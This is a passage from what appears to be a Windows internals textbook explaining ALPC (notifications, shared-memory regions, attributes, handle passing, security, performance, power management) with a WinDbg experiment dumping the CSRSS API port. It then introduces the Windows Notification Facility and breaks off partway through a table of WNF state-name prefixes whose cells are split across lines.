(nonblocking) model. As such, ALPC was primarily designed to support
asynchronous operation as well, which is a requirement for scalable RPC and
other uses, such as support for pending I/O in user-mode drivers. A basic
feature of ALPC, which wasn’t originally present in LPC, is that blocking
calls can have a timeout parameter. This allows legacy applications to avoid
certain deadlock scenarios.
However, ALPC is optimized for asynchronous messages and provides
three different models for asynchronous notifications. The first doesn’t
actually notify the client or server but simply copies the data payload. Under
this model, it’s up to the implementor to choose a reliable synchronization
method. For example, the client and the server can share a notification event
object, or the client can poll for data arrival. The data structure used by this
model is the ALPC completion list (not to be confused with the Windows I/O
completion port). The ALPC completion list is an efficient, nonblocking data
structure that enables atomic passing of data between clients, and its internals
are described further in the upcoming “Performance” section.
The next notification model is a waiting model that uses the Windows
completion-port mechanism (on top of the ALPC completion list). This
enables a thread to retrieve multiple payloads at once, control the maximum
number of concurrent requests, and take advantage of native completion-port
functionality. The user-mode thread pool implementation provides internal
APIs that processes use to manage ALPC messages within the same
infrastructure as worker threads, which are implemented using this model.
The RPC system in Windows, when using Local RPC (over ncalrpc), also
makes use of this functionality to provide efficient message delivery by
taking advantage of this kernel support, as does the kernel mode RPC
runtime in Msrpc.sys.
Finally, because drivers can run in arbitrary context and typically do not
like creating dedicated system threads for their operation, ALPC also
provides a mechanism for a more basic, kernel-based notification using
executive callback objects. A driver can register its own callback and context
with NtSetInformationAlpcPort, after which it will get called whenever a
message is received. The Power Dependency Coordinator (Pdc.sys) in the
kernel employs this mechanism for communicating with its clients, for
example. It’s worth noting that using an executive callback object has
potential advantages—but also security risks—in terms of performance.
Because the callbacks are executed in a blocking fashion (once signaled), and
inline with the signaling code, they will always run in the context of an
ALPC message sender (that is, inline with a user-mode thread calling
NtAlpcSendWaitReceivePort). This means that the kernel component can
have the chance to examine the state of its client without the cost of a context
switch and can potentially consume the payload in the context of the sender.
The reason these are not absolute guarantees, however (and this becomes a
risk if the implementor is unaware), is that multiple clients can send a
message to the port at the same time and existing messages can be sent by a
client before the server registers its executive callback object. It’s also
possible for another client to send yet another message while the server is
still processing the first message from a different client. In all these cases, the
server will run in the context of one of the clients that sent a message but
may be analyzing a message sent by a different client. The server should
distinguish this situation (since the Client ID of the sender is encoded in the
PORT_HEADER of the message) and attach/analyze the state of the correct
sender (which now has a potential context switch cost).
Views, regions, and sections
Instead of sending message buffers between their two respective processes, a
server and client can choose a more efficient data-passing mechanism that is
at the core of the memory manager in Windows: the section object. (More
information is available in Chapter 5 in Part 1.) This allows a piece of
memory to be allocated as shared and for both client and server to have a
consistent, and equal, view of this memory. In this scenario, as much data as
can fit can be transferred, and data is merely copied into one address range
and immediately available in the other. Unfortunately, shared-memory
communication, such as LPC traditionally provided, has its share of
drawbacks, especially when considering security ramifications. For one,
because both client and server must have access to the shared memory, an
unprivileged client can use this to corrupt the server’s shared memory and
even build executable payloads for potential exploits. Additionally, because
the client knows the location of the server’s data, it can use this information
to bypass ASLR protections. (See Chapter 5 in Part 1 for more information.)
ALPC provides its own security on top of what’s provided by section
objects. With ALPC, a specific ALPC section object must be created with the
appropriate NtAlpcCreatePortSection API, which creates the correct
references to the port, as well as allows for automatic section garbage
collection. (A manual API also exists for deletion.) As the owner of the
ALPC section object begins using the section, the allocated chunks are
created as ALPC regions, which represent a range of used addresses within
the section and add an extra reference to the message. Finally, within a range
of shared memory, the clients obtain views to this memory, which represents
the local mapping within their address space.
Regions also support a couple of security options. First, regions can be
mapped either using a secure mode or an unsecure mode. In the secure mode,
only two views (mappings) are allowed to the region. This is typically used
when a server wants to share data privately with a single client process.
Additionally, only one region for a given range of shared memory can be
opened from within the context of a given port. Finally, regions can also be
marked with write-access protection, which enables only one process context
(the server) to have write access to the view (by using
MmSecureVirtualMemoryAgainstWrites). Other clients, meanwhile, will
have read-only access only. These settings mitigate many privilege-
escalation attacks that could happen due to attacks on shared memory, and
they make ALPC more resilient than typical IPC mechanisms.
Attributes
ALPC provides more than simple message passing; it also enables specific
contextual information to be added to each message and have the kernel track
the validity, lifetime, and implementation of that information. Users of ALPC
can assign their own custom context information as well. Whether it’s
system-managed or user-managed, ALPC calls this data attributes. There are
seven attributes that the kernel manages:
■ The security attribute, which holds key information to allow
impersonation of clients, as well as advanced ALPC security
functionality (which is described later).
■ The data view attribute, responsible for managing the different views
associated with the regions of an ALPC section. It is also used to set
flags such as the auto-release flag, and when replying, to unmap a
view manually.
■ The context attribute, which allows user-managed context pointers to
be placed on a port, as well as on a specific message sent across the
port. In addition, a sequence number, message ID, and callback ID are
stored here and managed by the kernel, which allows uniqueness,
message-based hashing, and sequencing to be implemented by users
of ALPC.
■ The handle attribute, which contains information about which handles
to associate with the message (which is described in more detail later
in the “Handle passing” section).
■ The token attribute, which can be used to get the Token ID,
Authentication ID, and Modified ID of the message sender, without
using a full-blown security attribute (but which does not, on its own,
allow impersonation to occur).
■ The direct attribute, which is used when sending direct messages that
have a synchronization object associated with them (described later in
the “Direct event” section).
■ The work-on-behalf-of attribute, which is used to encode a work
ticket used for better power management and resource management
decisions (see the “Power management” section later).
Some of these attributes are initially passed in by the server or client when
the message is sent and converted into the kernel’s own internal ALPC
representation. If the ALPC user requests this data back, it is exposed back
securely. In a few cases, a server or client can always request an attribute,
because it is ALPC that internally associates it with a message and always
makes it available (such as the context or token attributes). By implementing
this kind of model and combining it with its own internal handle table,
described next, ALPC can keep critical data opaque between clients and
servers while still maintaining the true pointers in kernel mode.
To define attributes correctly, a variety of APIs are available for internal
ALPC consumers, such as AlpcInitializeMessageAttribute and
AlpcGetMessageAttribute.
Blobs, handles, and resources
Although the ALPC subsystem exposes only one Object Manager object type
(the port), it internally must manage a number of data structures that allow it
to perform the tasks required by its mechanisms. For example, ALPC needs
to allocate and track the messages associated with each port, as well as the
message attributes, which it must track for the duration of their lifetime.
Instead of using the Object Manager’s routines for data management, ALPC
implements its own lightweight objects called blobs. Just like objects, blobs
can automatically be allocated and garbage collected, reference tracked, and
locked through synchronization. Additionally, blobs can have custom
allocation and deallocation callbacks, which let their owners control extra
information that might need to be tracked for each blob. Finally, ALPC also
uses the executive’s handle table implementation (used for objects and
PIDs/TIDs) to have an ALPC-specific handle table, which allows ALPC to
generate private handles for blobs, instead of using pointers.
In the ALPC model, messages are blobs, for example, and their constructor
generates a message ID, which is itself a handle into ALPC’s handle table.
Other ALPC blobs include the following:
■ The connection blob, which stores the client and server
communication ports, as well as the server connection port and ALPC
handle table.
■ The security blob, which stores the security data necessary to allow
impersonation of a client. It stores the security attribute.
■ The section, region, and view blobs, which describe ALPC’s shared-
memory model. The view blob is ultimately responsible for storing
the data view attribute.
■ The reserve blob, which implements support for ALPC Reserve
Objects. (See the “Reserve objects” section earlier in this chapter.)
■ The handle data blob, which contains the information that enables
ALPC’s handle attribute support.
Because blobs are allocated from pageable memory, they must carefully be
tracked to ensure their deletion at the appropriate time. For certain kinds of
blobs, this is easy: for example, when an ALPC message is freed, the blob
used to contain it is also deleted. However, certain blobs can represent
numerous attributes attached to a single ALPC message, and the kernel must
manage their lifetime appropriately. For example, because a message can
have multiple views associated with it (when many clients have access to the
same shared memory), the views must be tracked with the messages that
reference them. ALPC implements this functionality by using a concept of
resources. Each message is associated with a resource list, and whenever a
blob associated with a message (that isn’t a simple pointer) is allocated, it is
also added as a resource of the message. In turn, the ALPC library provides
functionality for looking up, flushing, and deleting associated resources.
Security blobs, reserve blobs, and view blobs are all stored as resources.
Handle passing
A key feature of Unix Domain Sockets and Mach ports, which are the most
complex and most used IPC mechanisms on Linux and macOS, respectively,
is the ability to send a message that encodes a file descriptor which will then
be duplicated in the receiving process, granting it access to a UNIX-style file
(such as a pipe, socket, or actual file system location). With ALPC, Windows
can now also benefit from this model, with the handle attribute exposed by
ALPC. This attribute allows a sender to encode an object type, some
information about how to duplicate the handle, and the handle index in the
table of the sender. If the handle index matches the type of object the sender
is claiming to send, a duplicated handle is created, for the moment, in the
system (kernel) handle table. This first part guarantees that the sender truly is
sending what it is claiming, and that at this point, any operation the sender
might undertake does not invalidate the handle or the object beneath it.
Next, the receiver requests exposing the handle attribute, specifying the
type of object they expect. If there is a match, the kernel handle is duplicated
once more, this time as a user-mode handle in the table of the receiver (and
the kernel copy is now closed). The handle passing has been completed, and
the receiver is guaranteed to have a handle to the exact same object the
sender was referencing and of the type the receiver expects. Furthermore,
because the duplication is done by the kernel, it means a privileged server
can send a message to an unprivileged client without requiring the latter to
have any type of access to the sending process.
This handle-passing mechanism, when first implemented, was primarily
used by the Windows subsystem (CSRSS), which needs to be made aware of
any child processes created by existing Windows processes, so that they can
successfully connect to CSRSS when it is their turn to execute, with CSRSS
already knowing about their creation from the parent. It had several issues,
however, such as the inability to send more than a single handle (and
certainly not more than one type of object). It also forced receivers to always
receive any handle associated with a message on the port without knowing
ahead of time if the message should have a handle associated with it to begin
with.
To rectify these issues, Windows 8 and later now implement the indirect
handle passing mechanism, which allows sending multiple handles of
different types and allows receivers to manually retrieve handles on a per-
message basis. If a port accepts and enables such indirect handles (non-RPC-
based ALPC servers typically do not use indirect handles), handles will no
longer be automatically duplicated based on the handle attribute passed in
when receiving a new message with NtAlpcSendWaitReceivePort—instead,
ALPC clients and servers will have to manually query how many handles a
given message contains, allocate sufficient data structures to receive the
handle values and their types, and then request the duplication of all the
handles, parsing the ones that match the expected types (while
closing/dropping unexpected ones) by using
NtAlpcQueryInformationMessage and passing in the received message.
This new behavior also introduces a security benefit—instead of handles
being automatically duplicated as soon as the caller specifies a handle
attribute with a matching type, they are only duplicated when requested on a
per-message basis. Because a server might expect a handle for message A,
but not necessarily for all other messages, nonindirect handles can be
problematic if the server doesn’t think of closing any possible handle even
while parsing message B or C. With indirect handles, the server would never
call NtAlpcQueryInformationMessage for such messages, and the handles
would never be duplicated (or necessitate closing them).
Due to these improvements, the ALPC handle-passing mechanism is now
exposed beyond just the limited use-cases described and is integrated with
the RPC runtime and IDL compiler. It is now possible to use the
system_handle(sh_type) syntax to indicate more than 20 different handle
types that the RPC runtime can marshal from a client to a server (or vice-
versa). Furthermore, although ALPC provides the type checking from the
kernel’s perspective, as described earlier, the RPC runtime itself also does
additional type checking—for example, while both named pipes, sockets, and
actual files are all “File Objects” (and thus handles of type “File”), the RPC
runtime can do marshalling and unmarshalling checks to specifically detect
whether a Socket handle is being passed when the IDL file indicates
system_handle(sh_pipe), for example (this is done by calling APIs such as
GetFileAttribute, GetDeviceType, and so on).
This new capability is heavily leveraged by the AppContainer
infrastructure and is the key way through which the WinRT API transfers
handles that are opened by the various brokers (after doing capability checks)
and duplicated back into the sandboxed application for direct use. Other RPC
services that leverage this functionality include the DNS Client, which uses it
to populate the ai_resolutionhandle field in the GetAddrInfoEx API.
Security
ALPC implements several security mechanisms, full security boundaries, and
mitigations to prevent attacks in case of generic IPC parsing bugs. At a base
level, ALPC port objects are managed by the same Object Manager interfaces
that manage object security, preventing nonprivileged applications from
obtaining handles to server ports with ACL. On top of that, ALPC provides a
SID-based trust model, inherited from the original LPC design. This model
enables clients to validate the server they are connecting to by relying on
more than just the port name. With a secured port, the client process submits
to the kernel the SID of the server process it expects on the side of the
endpoint. At connection time, the kernel validates that the client is indeed
connecting to the expected server, mitigating namespace squatting attacks
where an untrusted server creates a port to spoof a server.
ALPC also allows both clients and servers to atomically and uniquely
identify the thread and process responsible for each message. It also supports
the full Windows impersonation model through the
NtAlpcImpersonateClientThread API. Other APIs give an ALPC server the
ability to query the SIDs associated with all connected clients and to query
the LUID (locally unique identifier) of the client’s security token (which is
further described in Chapter 7 of Part 1).
ALPC port ownership
The concept of port ownership is important to ALPC because it provides a
variety of security guarantees to interested clients and servers. First and
foremost, only the owner of an ALPC connection port can accept connections
on the port. This ensures that if a port handle were to be somehow duplicated
or inherited into another process, it would not be able to illegitimately accept
incoming connections. Additionally, when handle attributes are used (direct
or indirect), they are always duplicated in the context of the port owner
process, regardless of who may be currently parsing the message.
These checks are highly relevant when a kernel component might be
communicating with a client using ALPC—the kernel component may
currently be attached to a completely different process (or even be operating
as part of the System process with a system thread consuming the ALPC port
messages), and knowledge of the port owner means ALPC does not
incorrectly rely on the current process.
Conversely, however, it may be beneficial for a kernel component to
arbitrarily accept incoming connections on a port regardless of the current
process. One poignant example of this issue is when an executive callback
object is used for message delivery. In this scenario, because the callback is
synchronously called in the context of one or more sender processes, whereas
the kernel connection port was likely created while executing in the System
context (such as in DriverEntry), there would be a mismatch between the
current process and the port owner process during the acceptance of the
connection. ALPC provides a special port attribute flag—which only kernel
callers can use—that marks a connection port as a system port; in such a
case, the port owner checks are ignored.
Another important use case of port ownership is when performing server
SID validation checks if a client has requested it, as was described in the
“Security” section. This validation is always done by checking against the
token of the owner of the connection port, regardless of who may be listening
for messages on the port at this time.
Performance
ALPC uses several strategies to enhance performance, primarily through its
support of completion lists, which were briefly described earlier. At the
kernel level, a completion list is essentially a user Memory Descriptor List
(MDL) that’s been probed and locked and then mapped to an address. (For
more information on MDLs, see Chapter 5 in Part 1.) Because it’s associated
with an MDL (which tracks physical pages), when a client sends a message
to a server, the payload copy can happen directly at the physical level instead
of requiring the kernel to double-buffer the message, as is common in other
IPC mechanisms.
The completion list itself is implemented as a 64-bit queue of completed
entries, and both user-mode and kernel-mode consumers can use an
interlocked compare-exchange operation to insert and remove entries from
the queue. Furthermore, to simplify allocations, once an MDL has been
initialized, a bitmap is used to identify available areas of memory that can be
used to hold new messages that are still being queued. The bitmap algorithm
also uses native lock instructions on the processor to provide atomic
allocation and deallocation of areas of physical memory that can be used by
completion lists. Completion lists can be set up with
NtAlpcSetInformationPort.
A final optimization worth mentioning is that instead of copying data as
soon as it is sent, the kernel sets up the payload for a delayed copy, capturing
only the needed information, but without any copying. The message data is
copied only when the receiver requests the message. Obviously, if shared
memory is being used, there’s no advantage to this method, but in
asynchronous, kernel-buffer message passing, this can be used to optimize
cancellations and high-traffic scenarios.
Power management
As we’ve seen previously, when used in constrained power environments,
such as mobile platforms, Windows uses a number of techniques to better
manage power consumption and processor availability, such as by doing
heterogenous processing on architectures that support it (such as ARM64’s
big.LITTLE) and by implementing Connected Standby as a way to further
reduce power on user systems when under light use.
To play nice with these mechanisms, ALPC implements two additional
features: the ability for ALPC clients to push wake references onto their
ALPC server’s wake channel and the introduction of the Work On Behalf Of
Attribute. The latter is an attribute that a sender can choose to associate with
a message when it wants to associate the request with the current work ticket
that it is associated with, or to create a new work ticket that describes the
sending thread.
Such work tickets are used, for example, when the sender is currently part
of a Job Object (either due to being in a Silo/Windows Container or by being
part of a heterogenous scheduling system and/or Connected Standby system)
and their association with a thread will cause various parts of the system to
attribute CPU cycles, I/O request packets, disk/network bandwidth
attribution, and energy estimation to be associated to the “behalf of” thread
and not the acting thread.
Additionally, foreground priority donation and other scheduling steps are
taken to avoid big.LITTLE priority inversion issues, where an RPC thread is
stuck on the small core simply by virtue of being a background service. With
a work ticket, the thread is forcibly scheduled on the big core and receives a
foreground boost as a donation.
Finally, wake references are used to avoid deadlock situations when the
system enters a connected standby (also called Modern Standby) state, as was
described in Chapter 6 of Part 1, or when a UWP application is targeted for
suspension. These references allow the lifetime of the process owning the
ALPC port to be pinned, preventing the force suspend/deep freeze operations
that the Process Lifetime Manager (PLM) would attempt (or the Power
Manager, even for Win32 applications). Once the message has been
delivered and processed, the wake reference can be dropped, allowing the
process to be suspended if needed. (Recall that termination is not a problem
because sending a message to a terminated process/closed port immediately
wakes up the sender with a special PORT_CLOSED reply, instead of
blocking on a response that will never come.)
ALPC direct event attribute
Recall that ALPC provides two mechanisms for clients and servers to
communicate: requests, which are bidirectional, requiring a response, and
datagrams, which are unidirectional and can never be synchronously replied
to. A middle ground would be beneficial—a datagram-type message that
cannot be replied to but whose receipt could be acknowledged in such a way
that the sending party would know that the message was acted upon, without
the complexity of having to implement response processing. In fact, this is
what the direct event attribute provides.
By allowing a sender to associate a handle to a kernel event object
(through CreateEvent) with the ALPC message, the direct event attribute
captures the underlying KEVENT and adds a reference to it, tacking it onto
the KALPC_MESSAGE structure. Then, when the receiving process gets the
message, it can expose this direct event attribute and cause it to be signaled.
A client could either have a Wait Completion Packet associated with an I/O
completion port, or it could be in a synchronous wait call such as with
WaitForSingleObject on the event handle and would now receive a
notification and/or wait satisfaction, informing it of the message’s successful
delivery.
This functionality was previously manually provided by the RPC runtime,
which allows clients calling RpcAsyncInitializeHandle to pass in
RpcNotificationTypeEvent and associate a HANDLE to an event object with
an asynchronous RPC message. Instead of forcing the RPC runtime on the
other side to respond to a request message, such that the RPC runtime on the
sender’s side would then signal the event locally to signal completion, ALPC
now captures it into a Direct Event attribute, and the message is placed on a
Direct Message Queue instead of the regular Message Queue. The ALPC
subsystem will signal the message upon delivery, efficiently in kernel mode,
avoiding an extra hop and context-switch.
Debugging and tracing
On checked builds of the kernel, ALPC messages can be logged. All ALPC
attributes, blobs, message zones, and dispatch transactions can be
individually logged, and undocumented !alpc commands in WinDbg can
dump the logs. On retail systems, IT administrators and troubleshooters can
enable the ALPC events of the NT kernel logger to monitor ALPC messages,
(Event Tracing for Windows, also known as ETW, is discussed in Chapter
10.) ETW events do not include payload data, but they do contain connection,
disconnection, and send/receive and wait/unblock information. Finally, even
on retail systems, certain !alpc commands obtain information on ALPC ports
and messages.
EXPERIMENT: Dumping a connection port
In this experiment, you use the CSRSS API port for Windows
processes running in Session 1, which is the typical interactive
session for the console user. Whenever a Windows application
launches, it connects to CSRSS’s API port in the appropriate
session.
1.
Start by obtaining a pointer to the connection port with the
!object command:
Click here to view code image
lkd> !object \Sessions\1\Windows\ApiPort
Object: ffff898f172b2df0 Type: (ffff898f032f9da0)
ALPC Port
ObjectHeader: ffff898f172b2dc0 (new version)
HandleCount: 1 PointerCount: 7898
Directory Object: ffffc704b10d9ce0 Name: ApiPort
2.
Dump information on the port object itself with !alpc /p.
This will confirm, for example, that CSRSS is the owner:
Click here to view code image
lkd> !alpc /P ffff898f172b2df0
Port ffff898f172b2df0
Type : ALPC_CONNECTION_PORT
CommunicationInfo : ffffc704adf5d410
ConnectionPort : ffff898f172b2df0
(ApiPort), Connections
ClientCommunicationPort : 0000000000000000
ServerCommunicationPort : 0000000000000000
OwnerProcess : ffff898f17481140
(csrss.exe), Connections
SequenceNo : 0x0023BE45 (2342469)
CompletionPort : 0000000000000000
CompletionList : 0000000000000000
ConnectionPending : No
ConnectionRefused : No
Disconnected : No
Closed : No
FlushOnClose : Yes
ReturnExtendedInfo : No
Waitable : No
Security : Static
Wow64CompletionList : No
5 thread(s) are waiting on the port:
THREAD ffff898f3353b080 Cid 0288.2538 Teb:
00000090bce88000
Win32Thread: ffff898f340cde60 WAIT
THREAD ffff898f313aa080 Cid 0288.19ac Teb:
00000090bcf0e000
Win32Thread: ffff898f35584e40 WAIT
THREAD ffff898f191c3080 Cid 0288.060c Teb:
00000090bcff1000
Win32Thread: ffff898f17c5f570 WAIT
THREAD ffff898f174130c0 Cid 0288.0298 Teb:
00000090bcfd7000
Win32Thread: ffff898f173f6ef0 WAIT
THREAD ffff898f1b5e2080 Cid 0288.0590 Teb:
00000090bcfe9000
Win32Thread: ffff898f173f82a0 WAIT
THREAD ffff898f3353b080 Cid 0288.2538 Teb:
00000090bce88000
Win32Thread: ffff898f340cde60 WAIT
Main queue is empty.
Direct message queue is empty.
Large message queue is empty.
Pending queue is empty.
Canceled queue is empty.
3.
You can see what clients are connected to the port, which
includes all Windows processes running in the session, with
the undocumented !alpc /lpc command, or, with a newer
version of WinDbg, you can simply click the Connections
link next to the ApiPort name. You will also see the server
and client communication ports associated with each
connection and any pending messages on any of the queues:
Click here to view code image
lkd> !alpc /lpc ffff898f082cbdf0
ffff898f082cbdf0(’ApiPort’) 0, 131 connections
ffff898f0b971940 0 ->ffff898F0868a680 0
ffff898f17479080(’wininit.exe’)
ffff898f1741fdd0 0 ->ffff898f1742add0 0
ffff898f174ec240(’services.exe’)
ffff898f1740cdd0 0 ->ffff898f17417dd0 0
ffff898f174da200(’lsass.exe’)
ffff898f08272900 0 ->ffff898f08272dc0 0
ffff898f1753b400(’svchost.exe’)
ffff898f08a702d0 0 ->ffff898f084d5980 0
ffff898f1753e3c0(’svchost.exe’)
ffff898f081a3dc0 0 ->ffff898f08a70070 0
ffff898f175402c0(’fontdrvhost.ex’)
ffff898F086dcde0 0 ->ffff898f17502de0 0
ffff898f17588440(’svchost.exe’)
ffff898f1757abe0 0 ->ffff898f1757b980 0
ffff898f17c1a400(’svchost.exe’)
4.
Note that if you have other sessions, you can repeat this
experiment on those sessions also (as well as with session 0,
the system session). You will eventually get a list of all the
Windows processes on your machine.
Windows Notification Facility
The Windows Notification Facility, or WNF, is the core underpinning of a
modern registrationless publisher/subscriber mechanism that was added in
Windows 8 as a response to a number of architectural deficiencies when it
came to notifying interested parties about the existence of some action, event,
or state, and supplying a data payload associated with this state change.
To illustrate this, consider the following scenario: Service A wants to
notify potential clients B, C, and D that the disk has been scanned and is safe
for write access, as well as the number of bad sectors (if any) that were
detected during the scan. There is no guarantee that B, C, D start after A—in
fact, there’s a good chance they might start earlier. In this case, it is unsafe
for them to continue their execution, and they should wait for A to execute
and report the disk is safe for write access. But if A isn’t even running yet,
how does one wait for it in the first place?
A typical solution would be for B to create an event
“CAN_I_WAIT_FOR_A_YET” and then have A look for this event once
started, create the “A_SAYS_DISK_IS_SAFE” event and then signal
“CAN_I_WAIT_FOR_A_YET,” allowing B to know it’s now safe to wait
for “A_SAYS_DISK_IS_SAFE”. In a single client scenario, this is feasible,
but things become even more complex once we think about C and D, which
might all be going through this same logic and could race the creation of the
“CAN_I_WAIT_FOR_A_YET” event, at which point they would open the
existing event (in our example, created by B) and wait on it to be signaled.
Although this can be done, what guarantees that this event is truly created by
B? Issues around malicious “squatting” of the name and denial of service
attacks around the name now arise. Ultimately, a safe protocol can be
designed, but this requires a lot of complexity for the developer(s) of A, B, C,
and D—and we haven’t even discussed how to get the number of bad sectors.
WNF features
The scenario described in the preceding section is a common one in operating
system design—and the correct pattern for solving it clearly shouldn’t be left
to individual developers. Part of a job of an operating system is to provide
simple, scalable, and performant solutions to common architectural
challenges such as these, and this is what WNF aims to provide on modern
Windows platforms, by providing:
■ The ability to define a state name that can be subscribed to, or
published to by arbitrary processes, secured by a standard Windows
security descriptor (with a DACL and SACL)
■ The ability to associate such a state name with a payload of up to 4
KB, which can be retrieved along with the subscription to a change in
the state (and published with the change)
■ The ability to have well-known state names that are provisioned with
the operating system and do not need to be created by a publisher
while potentially racing with consumers—thus consumers will block
on the state change notification even if a publisher hasn’t started yet
■ The ability to persist state data even between reboots, such that
consumers may be able to see previously published data, even if they
were not yet running
■ The ability to assign state change timestamps to each state name, such
that consumers can know, even across reboots, if new data was
published at some point without the consumer being active (and
whether to bother acting on previously published data)
■ The ability to assign scope to a given state name, such that multiple
instances of the same state name can exist either within an interactive
session ID, a server silo (container), a given user token/SID, or even
within an individual process.
■ Finally, the ability to do all of the publishing and consuming of WNF
state names while crossing the kernel/user boundary, such that
components can interact with each other on either side.
WNF users
As the reader can tell, providing all these semantics allows for a rich set of
services and kernel components to leverage WNF to provide notifications and
other state change signals to hundreds of clients (which could be as fine-
grained as individual APIs in various system libraries to large scale
processes). In fact, several key system components and infrastructure now
use WNF, such as
■ The Power Manager and various related components use WNF to
signal actions such as closing and opening the lid, battery charging
state, turning the monitor off and on, user presence detection, and
more.
■ The Shell and its components use WNF to track application launches,
user activity, lock screen behavior, taskbar behavior, Cortana usage,
and Start menu behavior.
■ The System Events Broker (SEB) is an entire infrastructure that is
leveraged by UWP applications and brokers to receive notifications
about system events such as the audio input and output.
■ The Process Manager uses per-process temporary WNF state names
to implement the wake channel that is used by the Process Lifetime
Manager (PLM) to implement part of the mechanism that allows
certain events to force-wake processes that are marked for suspension
(deep freeze).
Enumerating all users of WNF would take up this entire book because
more than 6000 different well-known state names are used, in addition to the
various temporary names that are created (such as the per-process wake
channels). However, a later experiment showcases the use of the wnfdump
utility part of the book tools, which allows the reader to enumerate and
interact with all of their system’s WNF events and their data. The Windows
Debugging Tools also provide a !wnf extension that is shown in a future
experiment and can also be used for this purpose. Meanwhile, the Table 8-31
explains some of the key WNF state name prefixes and their uses. You will
encounter many Windows components and codenames across a vast variety
of Windows SKUs, from Windows Phone to XBOX, exposing the richness
of the WNF mechanism and its pervasiveness.
Table 8-31 WNF state name prefixes
Prefix
# of
Names
Usage
9P
2
Plan 9 Redirector
A2A
1
App-to-App
AAD
2
Azure Active Directory
AA
3
Assigned Access
ACC
1
Accessibility
ACH
K
1
Boot Disk Integrity Check (Autochk)
ACT
1
Activity
AFD
1
Ancillary Function Driver (Winsock)
AI
9
Application Install
AOW
1
Android-on-Windows (Deprecated)
ATP
1
Microsoft Defender ATP
AUD
C
15
Audio Capture
AVA
1
Voice Activation
AVL
C
3
Volume Limit Change
BCST
1
App Broadcast Service
BI
16
Broker Infrastructure
BLT
H
14
Bluetooth
BMP
2
Background Media Player
BOO
T
3
Boot Loader
BRI
1
Brightness
BSC
1
Browser Configuration (Legacy IE, Deprecated)
CAM
66
Capability Access Manager
CAPS
1
Central Access Policies
CCT
L
1
Call Control Broker
CDP
17
Connected Devices Platform (Project
“Rome”/Application Handoff)
CEL
L
78
Cellular Services
CER
T
2
Certificate Cache
CFC
L
3
Flight Configuration Client Changes
CI
4
Code Integrity
CLIP
6
Clipboard
CMF
C
1
Configuration Management Feature Configuration
CMP
T
1
Compatibility
CNE
T
10
Cellular Networking (Data)
CON
T
1
Containers
CSC
1
Client Side Caching
CSH
L
1
Composable Shell
CSH
1
Custom Shell Host
CXH
6
Cloud Experience Host
DBA
1
Device Broker Access
DCSP
1
Diagnostic Log CSP
DEP
2
Deployment (Windows Setup)
DEV
M
3
Device Management
DICT
1
Dictionary
DISK
1
Disk
DISP
2
Display
DMF
4
Data Migration Framework
DNS
1
DNS
DO
2
Delivery Optimization
DSM
2
Device State Manager
DUM
P
2
Crash Dump
DUS
M
2
Data Usage Subscription Management
DW
M
9
Desktop Window Manager
DXG
K
2
DirectX Kernel
DX
24
DirectX
EAP
1
Extensible Authentication Protocol
EDG
E
4
Edge Browser
EDP
15
Enterprise Data Protection
EDU
1
Education
EFS
2
Encrypted File Service
EMS
1
Emergency Management Services
ENT
R
86
Enterprise Group Policies
EOA
8
Ease of Access
ETW
1
Event Tracing for Windows
EXE
C
6
Execution Components (Thermal Monitoring)
FCO
N
1
Feature Configuration
FDB
K
1
Feedback
FLT
N
1
Flighting Notifications
FLT
2
Filter Manager
FLY
T
1
Flight ID
FOD
1
Features on Demand
FSRL
2
File System Runtime (FsRtl)
FVE
15
Full Volume Encryption
GC
9
Game Core
GIP
1
Graphics
GLO
B
3
Globalization
GPO
L
2
Group Policy
HAM
1
Host Activity Manager
HAS
1
Host Attestation Service
HOL
O
32
Holographic Services
HPM
1
Human Presence Manager
HVL
1
Hypervisor Library (Hvl)
HYP
V
2
Hyper-V
IME
4
Input Method Editor
IMSN
7
Immersive Shell Notifications
IMS
1
Entitlements
INPU
T
5
Input
IOT
2
Internet of Things
ISM
4
Input State Manager
IUIS
1
Immersive UI Scale
KSR
2
Kernel Soft Reboot
KSV
5
Kernel Streaming
LAN
G
2
Language Features
LED
1
LED Alert
LFS
12
Location Framework Service
LIC
9
Licensing
LM
7
License Manager
LOC
3
Geolocation
LOG
N
8
Logon
MAP
S
3
Maps
MBA
E
1
MBAE
MM
3
Memory Manager
MON
1
Monitor Devices
MRT
5
Microsoft Resource Manager
MSA
7
Microsoft Account
MSH
L
1
Minimal Shell
MUR
2
Media UI Request
MU
1
Unknown
NAS
V
5
Natural Authentication Service
NCB
1
Network Connection Broker
NDIS
2
Kernel NDIS
NFC
1
Near Field Communication (NFC) Services
NGC
12
Next Generation Crypto
NLA
2
Network Location Awareness
NLM
6
Network Location Manager
NLS
4
Nationalization Language Services
NPS
M
1
Now Playing Session Manager
NSI
1
Network Store Interface Service
OLIC
4
OS Licensing
OOB
E
4
Out-Of-Box-Experience
OSW
N
8
OS Storage
OS
2
Base OS
OVR
D
1
Window Override
PAY
1
Payment Broker
PDM
2
Print Device Manager
PFG
2
Pen First Gesture
PHN
L
1
Phone Line
PHN
P
3
Phone Private
PHN
2
Phone
PME
M
1
Persistent Memory
PNP
A-D
13
Plug-and-Play Manager
PO
54
Power Manager
PRO
V
6
Runtime Provisioning
PS
1
Kernel Process Manager
PTI
1
Push to Install Service
RDR
1
Kernel SMB Redirector
RM
3
Game Mode Resource Manager
RPC
F
1
RPC Firewall Manager
RTD
S
2
Runtime Trigger Data Store
RTS
C
2
Recommended Troubleshooting Client
SBS
1
Secure Boot State
SCH
3
Secure Channel (SChannel)
SCM
1
Service Control Manager
SDO
1
Simple Device Orientation Change
SEB
61
System Events Broker
SFA
1
Secondary Factor Authentication
SHE
L
138
Shell
SHR
3
Internet Connection Sharing (ICS)
SIDX
1
Search Indexer
SIO
2
Sign-In Options
SYK
D
2
SkyDrive (Microsoft OneDrive)
SMS
R
3
SMS Router
SMSS
1
Session Manager
SMS
1
SMS Messages
SPAC
2
Storage Spaces
SPC
H
4
Speech
SPI
1
System Parameter Information
SPLT
4
Servicing
SRC
1
System Radio Change
SRP
1
System Replication
SRT
1
System Restore (Windows Recovery Environment)
SRU
M
1
Sleep Study
SRV
2
Server Message Block (SMB/CIFS)
STO
R
3
Storage
SUPP
1
Support
SYN
C
1
Phone Synchronization
SYS
1
System
TB
1
Time Broker
TEA
M
4
TeamOS Platform
TEL
5
Microsoft Defender ATP Telemetry
TET
H
2
Tethering
THM
E
1
Themes
TKB
24
Touch Keyboard Broker
N
TKB
R
3
Token Broker
TMC
N
1
Tablet Mode Control Notification
TOP
E
1
Touch Event
TPM
9
Trusted Platform Module (TPM)
TZ
6
Time Zone
UBP
M
4
User Mode Power Manager
UDA
1
User Data Access
UDM
1
